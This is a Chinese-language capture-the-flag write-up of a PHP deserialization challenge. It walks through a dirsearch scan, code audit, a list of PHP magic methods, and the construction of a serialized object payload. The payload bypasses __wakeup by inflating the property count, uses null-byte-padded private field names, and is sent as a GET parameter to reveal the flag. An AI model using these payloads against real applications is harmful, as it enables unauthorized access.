PHP序列化与反序列化
参考文献:浅谈反序列漏洞
1、目录扫描,使用目录扫描工具dirsearch,扫出来一个www.zip的文件,download。
python dirsearch.py -u http://fd524dc7-eca6-4d21-b9c6-f168d37e3951.node3.buuoj.cn/ -e * -w db/dir.txt
2、查看flag.php,发现是个假的flag,因此查看index.php,查看其中的php代码,发现是文件包含的时候,进行了反序列化的过程,传入一个select的参数,进行反序列化的过程
3、查看class.php,代码审计,我们要调用到__destruct()并且password=100,username=admin
才能echo $flag
魔法函数
通常来说有一些PHP的魔法函数会导致反序列化漏洞,如:
__construct 当一个对象创建时自动调用__destruct 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)
__sleep() 使**用serialize()**函数时触发__wakeup 使**用unserialse()**函数时会自动调用
__toString 当一个对象被当作一个字符串被调用。__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发__get() 用于从不可访问的属性读取数据//调用私有属性时使用
__set() 用于将数据写入不可访问的属性__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发__toString() 把类当作字符串使用时触发,返回值需要为字符串
__invoke() 当脚本尝试将对象调用为函数时触发
4、构造test.php代码,即可得到序列化的结果。
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b = serialize($a);
echo $b;
?>
5、序列化后,运行apache服务器,在本地执行test.php得到结果。
在反序列化的时候会首先执行__wakeup()魔术方法,但是这个方法会把我们的username重新赋值,所以我们要考虑的就是怎么跳过__wakeup(),而去执行__destruct
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
6、绕过__wakeup
这个魔术函数,利用反序列化漏洞,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会绕过__wakeup
的执行
__wakeup()方法
作用:
与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。
绕过:
反序列化字符串,当属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。
本题中,wakeup方法会导致username成为guest,因此需要通过改序列化字符串中对象的个数来绕过该方法。
name后面的2,代表类中有2个属性,但如果我们把2改成3,就会绕过__wakeup()函数。
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
7、又因为这个声明变量是private,private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上0的前缀。字符串长度也包括所加前缀的长度
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
8、使用GET请求,把准备好的序列化作为select的参数传入,然后url识别不了"
,改为%22
%00
不可见的空字符(Null) ASCII码十进制为0
%20
空格
/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
9、得到flag:flag{b46c16d0-eb8d-4bca-a4ac-a9737a7f9d50
10、拓展:为什么要写%00Name%00username这样的形式?
只有public修饰的不用太多的修饰原生态构造就好
private需要加**%00Name%00**,
protected则需要使用 %00*%00username这样的方式
protected修饰变量,运行后回显代码内注释内容
<?php
class Name{
protected $username = 'nonono';看这两行
protected $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//运行会输出 O:4:"Name":2:{s:11:"%00*%00username";s:5:"admin";s:11:"%00*%00password";i:100;}
?>
public修饰变量,运行后回显代码内注释内容
<?php
class Name{
public $username = 'nonono';
public $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>
private修饰变量,运行后回显代码内注释内容
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00 password";i:100;}
?>